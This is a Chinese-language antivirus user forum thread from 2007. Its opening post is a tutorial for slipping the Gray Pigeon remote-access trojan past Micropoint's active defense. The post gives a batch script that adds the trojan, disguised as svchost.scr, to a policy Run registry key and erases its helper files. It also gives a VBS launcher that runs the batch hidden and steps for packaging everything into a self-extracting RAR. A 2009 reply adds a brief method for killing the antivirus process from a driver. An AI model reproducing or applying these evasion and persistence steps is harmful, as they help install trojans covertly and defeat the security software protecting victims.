微点交流论坛

标题: 灰鸽子再次穿越微点(第三) [此方法经过多人测试.无法穿越0153版本]）(版主请来封帖) [打印本页]

作者: cici584522 时间: 2007-11-16 18:30 标题: 灰鸽子再次穿越微点(第三) [此方法经过多人测试.无法穿越0153版本]）(版主请来封帖)

录象捎后放出

大家好

我是小东￠酷儿（通用论坛ID cici584522)

欢迎大家访问我的BLOG  http://www.hackhobby.com

===================================================

“灰鸽子再次穿越微点(录象)”
此文章的方法已经被最新版本0153所封

但挑战主动防御并不会因此而终止。。

简单先介绍下上次的 “灰鸽子再次穿越微点(录象)”的思路，鸽子被做成自

解压缩后。。被释放到启动文件夹，但不立即运行，而是等重起或注销后自动

随系统启动。。而0153版本在此思路上更加入了智能化的判断。。就在重起后进

行拦截。。或许是微点记录着此木马为上次开机自解压缩到启动文件夹的。。也

可能是微点加大了对启动文件夹的敏感。。

下面就让我们来看下新的办法（临时防御办法开启微点防火墙）

既然启动文件夹已经可以说被盯死。。。那我们就换个办法吧。。。

用写注册表的方法（即使微点开启注册表保护。也不能拦截。因为
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\
Explorer\Run 这个地方是微点保护不到的。。。而这里就是组策略中可以设置
的开机启动项目

我们先做一个写注册表的批处理

@echo off
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run" /v lin /t REG_SZ /d %systemroot%\svchost.scr /f
@del /q /f /s %systemroot%\iexp.vbe
@del /q /f /s %systemroot%\iexp.bat

意思是把 WINDOWS目录下的 svchost.scr 列为开机启动项目，再将 iexp.vbe 与 iexp.bat 删除

因为批处理运行会弹出DOS窗后。。所以我们再准备个VBS脚本（VBE也可）

Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c iexp.bat",vbhide

意思是隐藏运行批处理 iexp.bat

把批处理和VBS与木马（命名为svchost.scr（SCR后缀本为屏幕保护程序)。不过
PE文件使用依然可以运行 / 灰鸽子的配置办法请看之前的文

章，这里就不说了,只是鸽子释放路径在此次录象中使用的是[$(WinDir)
\svchost.scr]）用RAR自解压缩。设置路径为%systemroot%（WIN目录下）。

然后设置解压缩后运行 iexp.vbe

不是PE可执行文件。。微点不会报的

现在运行自解压缩。。。把微点打开

微点主动防御软件  预升级
程序版本： 1.2.10571.0153
特征版本： 1.6.498.071111
更新时间： 2007-11-16 11:02:46

版本0153

没弹拦截。。重起后运行。。。不会拦截

教程结束。。希望微点早点解决。。

[ Last edited by cici584522 on 2007-12-28 at 01:39 ]

作者: david1126103 时间: 2007-11-16 18:35
希望继续努力，共同探索

作者: 青豆 时间: 2007-11-16 22:28
支持高手探索

作者: hds_ss 时间: 2007-11-16 23:32
微点应该针对几次穿越，找出问题所在，然后针对性的进行解决，不能头痛医头，脚痛医脚，这不解决问题。

作者: loveyuwei 时间: 2007-11-17 00:23
嗯，同意LS的看法。

作者: yiyefuwei 时间: 2007-11-17 00:54

Quote:

Originally posted by hds_ss at 2007-11-16 23:32:
微点应该针对几次穿越，找出问题所在，然后针对性的进行解决，不能头痛医头，脚痛医脚，这不解决问题。

建议是很好的~~但是一个软件,但的修复难度,要远远大于他开发难度
你打一个补丁,就会有可能造成更多麻烦~~~这就是软件~~

作者: Rokit 时间: 2007-11-17 17:59
那这回到底是漏了还是没有哦?

作者: qq2008444 时间: 2007-11-17 20:24

Quote:

Originally posted by Rokit at 2007-11-17 17:59:
那这回到底是漏了还是没有哦?

应该是漏了
嗨...果然盾和矛之间的斗争是永远进行下去的

作者: tanlimo 时间: 2007-11-17 20:31
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run （这么重要的位置居然没有保护，真晕。）

作者: nasdaq 时间: 2007-11-18 15:01
虽然这次没有能够成功突破微点主动防御，但是楼主的精神非常值得鼓励，同样用我的最大权限+10严重鼓励。

PS：欢迎大家来主动防御区讨论主动防御，以及进行各种技术测试。漫骂的不要，加分的管够。

作者: hapy 时间: 2007-11-19 09:37
楼主没有锁定注册表,所以能够写入,我一般都是锁定注册表的....

作者: zheng363663 时间: 2007-11-19 16:22 标题: ````````````

``支持LZ,继续努力,为了微点的明天

作者: hljking 时间: 2007-12-22 14:11
锁定注册表为什么还可以安装软件？？软件的安装不进入注册表？

作者: johnchu 时间: 2007-12-22 14:41
楼主上次不是说要穿卡巴的吗，成功了没有啊？

作者: 千里走单骑 时间: 2007-12-22 18:16
嗯！这样的提示对我们菜鸟帮助很大！楼主感谢！！

作者: fujianwzh 时间: 2007-12-22 19:56
现在就看灰鸽子能不能抢在微点的前面启动。。。

谁能抢先，谁就是胜者。。

作者: 千里走单骑 时间: 2007-12-24 02:28

Quote:

Originally posted by fujianwzh at 2007-12-22 19:56:
现在就看灰鸽子能不能抢在微点的前面启动。。。

谁能抢先，谁就是胜者。。

嗯！同意！

作者: eaglesage 时间: 2007-12-27 14:05
这么多高手啊呵呵真幸运啊

作者: BLAZING 时间: 2009-4-26 18:12
锁定后还有用吗？

作者: mj0011_2 时间: 2009-4-26 18:51
加分能换钱？
驱动加载后直接CR3 微点的进程，然后清0，微点根本拦不了

作者: weidianfs 时间: 2009-4-26 19:56
希望在高手们的努力下，微点明天更美好！

作者: 405016 时间: 2009-4-26 20:33
我拜读过lz的过瑞星主防，原来是高手

[ Last edited by 405016 on 2009-4-27 at 07:09 ]

作者: 20090218 时间: 2009-5-1 17:30
微点还需加强保护

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn